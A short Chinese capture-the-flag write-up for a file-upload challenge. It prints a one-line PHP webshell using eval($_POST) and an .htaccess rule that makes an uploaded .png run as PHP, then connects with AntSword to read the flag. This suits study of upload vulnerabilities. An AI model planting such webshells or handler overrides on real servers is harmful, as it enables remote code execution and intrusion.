解題思路
打開靶場,左邊是艾克,右邊是詩人,下面有個文件上傳按鈕?
結合題目,是一個文件上傳漏洞,一鍵去世看源碼可知是提交按鈕,先上傳個一句話木馬.php試試
<?php
eval($_POST['shell']);
?>
被過濾了,更改文件后綴試試
?
上傳成功,說明沒有檢測內容是否為圖片,而是檢測了后綴和類型,這里嘗試更改其他繞過的后綴、如雙寫繞過、phtml繞過、php5等繞過都失敗了,剩下解析漏洞是可以使用的。
創建.htaccess文件,該文件為解析文件,不可加前綴,必須是.htaccess,內容如下
<FilesMatch "eason.png">
SetHandler application/x-httpd-php
</FilesMatch>
將eason.png作為php文件來解析運行
然后將我們上傳的一句話木馬更改為eason.png
然后用蟻劍連接即可
?比較坑的一個點是路徑問題
給的路徑是從根目錄下的絕對路徑
/var/www/html/upload/2c12c739b42851d68808dcf58e8fa253/eason.png
因此我們這里應該使用相對路徑,從upload開始才能連接成功哈?
http://e03373b4-086f-48bc-a53b-1146cd081dc1.node5.buuoj.cn:81/upload/2c12c739b42851d68808dcf58e8fa253/eason.png
最終在根目錄下獲取flag
總結
算是進階的文件上傳漏洞,通過上傳解析文件,讓webshell執行?